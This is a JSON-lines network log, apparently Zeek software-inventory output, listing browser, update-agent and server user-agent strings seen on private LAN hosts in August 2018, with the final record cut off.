+{"ts":"2018-08-03T23:37:11.959041Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.937964Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.922482Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.938566Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.934621Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.934838Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.940220Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:14.912484Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:15.478316Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:15.435221Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:15.437343Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:16.617648Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:16.620317Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:16.610887Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:17.068973Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:17.073875Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:17.075908Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:17.990096Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:17.994120Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:18.252649Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:18.246211Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:18.251562Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:18.284440Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:18.293081Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:18.251437Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:18.249011Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:20.274151Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Wget","version.major":1,"version.minor":15,"version.addl":"linux-gnu","unparsed_version":"Wget/1.15 (linux-gnu)"} +{"ts":"2018-08-03T23:37:20.271764Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Wget","version.major":1,"version.minor":15,"version.addl":"linux-gnu","unparsed_version":"Wget/1.15 (linux-gnu)"} +{"ts":"2018-08-03T23:37:20.275222Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Wget","version.major":1,"version.minor":15,"version.addl":"linux-gnu","unparsed_version":"Wget/1.15 (linux-gnu)"} +{"ts":"2018-08-03T23:37:20.455047Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.450298Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.449498Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.457799Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.466766Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.454079Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.450398Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.450901Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.453721Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.487529Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.451111Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.458520Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.456533Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.478858Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.477848Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.620611Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:20.459772Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.463872Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.448336Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"MSIE","version.major":6,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"} +{"ts":"2018-08-03T23:37:20.682065Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:20.693502Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:20.707476Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:21.165431Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:22.401584Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:22.409339Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:22.395605Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:22.382451Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:22.439510Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":6,"version.minor":7,"unparsed_version":"Microsoft BITS/6.7"} +{"ts":"2018-08-03T23:37:22.464852Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:22.404642Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:22.403822Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:22.407305Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:22.384662Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:22.386968Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:22.477908Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"LegitCheck","unparsed_version":"LegitCheck"} +{"ts":"2018-08-03T23:37:22.383791Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:23.090620Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.092069Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.092069Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"WATClient","unparsed_version":"WATClient"} +{"ts":"2018-08-03T23:37:23.102217Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"SLSSoapClient","unparsed_version":"SLSSoapClient"} +{"ts":"2018-08-03T23:37:23.090769Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.091770Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.089084Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NVIDIA Notifius","version.major":1,"version.minor":14,"version.minor2":17,"unparsed_version":"NVIDIA Notifius v1.14.17"} +{"ts":"2018-08-03T23:37:23.114343Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:23.132750Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.124233Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0"} +{"ts":"2018-08-03T23:37:23.089922Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.105097Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"WicaAgent","unparsed_version":"WicaAgent"} +{"ts":"2018-08-03T23:37:23.140461Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.141239Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.127222Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0"} +{"ts":"2018-08-03T23:37:23.129745Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.104794Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.140217Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.106404Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:23.141841Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.164714Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.126758Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.141928Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.084667Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.170649Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.149770Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.092600Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft NCSI","unparsed_version":"Microsoft NCSI"} +{"ts":"2018-08-03T23:37:23.092600Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT","unparsed_version":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT"} +{"ts":"2018-08-03T23:37:23.102731Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.132126Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.132914Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.173366Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.168103Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.104322Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"} +{"ts":"2018-08-03T23:37:23.175142Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.175090Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.132537Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.090970Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.131480Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.136286Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.198828Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MSIE","version.major":11,"version.minor":0,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"} +{"ts":"2018-08-03T23:37:23.321958Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-Windows","version.major":6,"version.minor":1,"version.addl":"UPnP/1","unparsed_version":"Microsoft-Windows/6.1 UPnP/1.0"} +{"ts":"2018-08-03T23:37:23.167166Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:23.318110Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:23.379199Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:23.314565Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:23.218145Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:24.245809Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.241628Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:24.238546Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.249200Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.228908Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:24.244109Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.246383Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.339165Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.341702Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.225673Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36"} +{"ts":"2018-08-03T23:37:24.422589Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.339860Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.339750Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.334205Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:37:24.230521Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":76,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 